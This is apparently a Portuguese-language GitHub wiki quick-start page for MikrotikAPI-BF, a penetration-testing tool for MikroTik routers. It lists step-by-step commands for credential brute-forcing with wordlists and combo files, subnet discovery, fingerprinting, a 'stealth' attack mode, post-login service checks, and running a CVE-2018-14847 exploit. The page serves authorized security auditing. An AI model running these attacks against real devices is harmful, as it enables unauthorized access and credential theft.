Quick Start pt BR - mrhenrike/MikrotikAPI-BF GitHub Wiki
Inicio Rapido
Idioma: Portugues (pt-BR) ยท English
Obtenha seu primeiro resultado em menos de 60 segundos.
Passo 1 โ Clonar e Instalar
git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
python -m venv .venv && source .venv/bin/activate # Linux/macOS
python -m venv .venv && .venv\Scripts\activate # Windows
pip install -r requirements.txt
Passo 2 โ Teste de Credencial Unica
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P admin
Passo 3 โ Ataque com Wordlist
python mikrotikapi-bf.py -t 192.168.88.1 \
-u examples/usernames.txt \
-p examples/passwords.txt \
--progress
Passo 4 โ Ataque com Combo File
python mikrotikapi-bf.py -t 192.168.88.1 -d examples/combos.txt --progress
Passo 5 โ Exportar Resultados
python mikrotikapi-bf.py -t 192.168.88.1 -d examples/combos.txt \
--export-all \
--audit-report \
--progress
Fluxo Tipico de Pentest
# 1. Descobrir dispositivos Mikrotik na sub-rede
python mikrotikapi-bf.py --discover -n 192.168.1.0/24 --threads 50 --progress
# 2. Fingerprint do alvo
python mikrotikapi-bf.py -t 192.168.88.1 --fingerprint -v
# 3. Ataque furtivo com wordlist
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --stealth --progress
# 4. Validacao de servicos pos-login
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P senha_encontrada \
--validate ftp,ssh,telnet --progress
# 5. Exportar relatorio completo
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
--export-all --audit-report
# 6. Executar exploit especifico (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.88.1 --run-exploit CVE-2018-14847
# 7. Auditoria completa em 8 fases com SARIF (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.88.1 --audit -U admin -P senha_encontrada \
--export sarif
Ver tambem: Exemplos de Uso ยท Referencia de API